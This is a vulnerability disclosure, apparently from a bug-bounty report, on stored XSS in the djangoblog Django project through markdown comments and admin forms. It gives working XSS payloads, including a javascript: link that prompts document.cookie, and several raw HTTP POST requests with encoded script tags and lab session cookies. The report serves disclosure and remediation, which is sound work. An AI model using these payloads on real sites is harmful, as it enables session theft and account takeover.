Stored XSS via Markdown Comment in liangliangyy/djangoblog

Valid

Reported on

Apr 6th 2023

Description

Register one account on blog, if account was actived, it can be comment.
We can commment with markdown.
When another user clicks on the comment there may be an XSS alert.

I git clone project and build with docker. Latest commit is: 07a1ded08eb4e0c6979f6aeebc35f3864ba250a7

Example Image

Proof of Concept

Payload:
[a](javascript:prompt(document.cookie))
[Basic](javascript:alert('xss'))

POST /article/1/postcomment HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/article/2023/4/6/1.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpkSFZoYm5SbzoxNzExODU2NTQ0Ojk4OTI2YTZkOWM1YmE2OTEzYTk5MzMzNWVjMjE3NWU2YjdkNzg5N2FmNWVkZjg4ZDZmMjBkZTg1ODMxNmM3YjU%3D; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680331398; auth=%5B%22admin%22%2C%227676aaafb027c825bd9abab78b234070e702752f625b752e55e55b48e607e358%22%5D; csrftoken=OH2D3FHqNQqmFTVYnsIHXfheAaMZ3KnK; sessionid=kiqlg6int19jse966u7ozov5r1s2c9sh
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=Qihis6iSMnxK4jyE7zzlItn7EdQ7LrMCuP9LlBP8p3NWz2jskR7Svyub4dsWE1Zc&body=%5Ba%5D%28javascript%3Aprompt%28document.cookie%29%29&parent_comment_id=&submit=%E5%8F%91%E8%A1%A8%E8%AF%84%E8%AE%BA..

Other user read blog and click on comment and a alert show
Example Image

Example Image

OTHER
Besides user-caused XSS on the comment function. I still see XSS case when admin add/edit a post, sidebar, category... When you add the payload code in the parameters when the user loads the site there will be XSS messages. For more information see second occurrences

Impact

XSS can cause serious issues. Attackers often leverage XSS to steal session cookies and impersonate the use

Occurrences

admin.py L114-L125

sibar create/edit

POST /admin/blog/sidebar/1/change/ HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/admin/blog/sidebar/1/change/
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpNVEVpUGp4elkzSnBjSFErWVd4bGNuUW9KMWhUVXljcFBDOXpZM0pwY0hRKzoxNzExODU2NzYyOjAxMDIwM2VmMmY1NTU2OGUzZTc2NjY0N2I2NTU4NDYxNjc1MDU5ZDZkMmY3N2ZiNGEyNWVlNWMzMmI4YTdjNTE%3D; csrftoken=3OcxwMXavXh7dZpOcnbBOiXu8s0BCrIW; sessionid=mn6hj5i3oold6ag7ow3jzu77tginluur
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=pFnbOlOj9r3UqDODE0ihYVrAcJfvccpAijpyaXBjueaRts3hGdjIC3eUa15WEtXm&name=1%22%3E%3Cscript%3Ealert%28a%29%3C%2Fscript%3E&content=1%22%3E%3Cscript%3Ealert%28a%29%3C%2Fscript%3E&sequence=0&is_enable=on&_save=%E4%BF%9D%E5%AD%98

Example Image

Category create/edit:

POST /admin/blog/category/1/change/ HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/admin/blog/category/1/change/
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpNVEVpUGp4elkzSnBjSFErWVd4bGNuUW9KMWhUVXljcFBDOXpZM0pwY0hRKzoxNzExODU2NzYyOjAxMDIwM2VmMmY1NTU2OGUzZTc2NjY0N2I2NTU4NDYxNjc1MDU5ZDZkMmY3N2ZiNGEyNWVlNWMzMmI4YTdjNTE%3D; csrftoken=3OcxwMXavXh7dZpOcnbBOiXu8s0BCrIW; sessionid=mn6hj5i3oold6ag7ow3jzu77tginluur
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=dKVOOPwuo2wTeFU4Suka43bxu1lNrzFv6oXbarjuJPDQhu9IUHlBIbYRsjbeTQdh&name=1%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&parent_category=&index=1&_save=%E4%BF%9D%E5%AD%98

Example Image

article create/edit

POST /admin/blog/article/3/change/ HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/admin/blog/article/3/change/
Content-Type: application/x-www-form-urlencoded
Content-Length: 529
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpNVEVpUGp4elkzSnBjSFErWVd4bGNuUW9KMWhUVXljcFBDOXpZM0pwY0hRKzoxNzExODU2NzYyOjAxMDIwM2VmMmY1NTU2OGUzZTc2NjY0N2I2NTU4NDYxNjc1MDU5ZDZkMmY3N2ZiNGEyNWVlNWMzMmI4YTdjNTE%3D; csrftoken=3OcxwMXavXh7dZpOcnbBOiXu8s0BCrIW; sessionid=mn6hj5i3oold6ag7ow3jzu77tginluur
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=MNde063Oc91PoCg3hhB9yI2jwxRfCSBRFrfBmIQOxW8MrrvHjuCAcQPDuPHG499D&title=TEST&body=11%22%3E%3Cscript%3Ealert%28%27post%27%29%3C%2Fscript%3E&id_body-wmd-wrapper-html-code=%3Cp%3E11%E2%80%9D%26gt%3B%26lt%3Bscript%26gt%3Balert%28%E2%80%98post%E2%80%99%29%26lt%3B%2Fscript%26gt%3B%3C%2Fp%3E%0D%0A&pub_time_0=2023%2F04%2F07&pub_time_1=00%3A57&initial-pub_time_0=2023%2F04%2F07&initial-pub_time_1=00%3A57&status=p&comment_status=o&type=a&views=9&author=1&article_order=0&category=1&tags_old=1&_save=%E4%BF%9D%E5%AD%98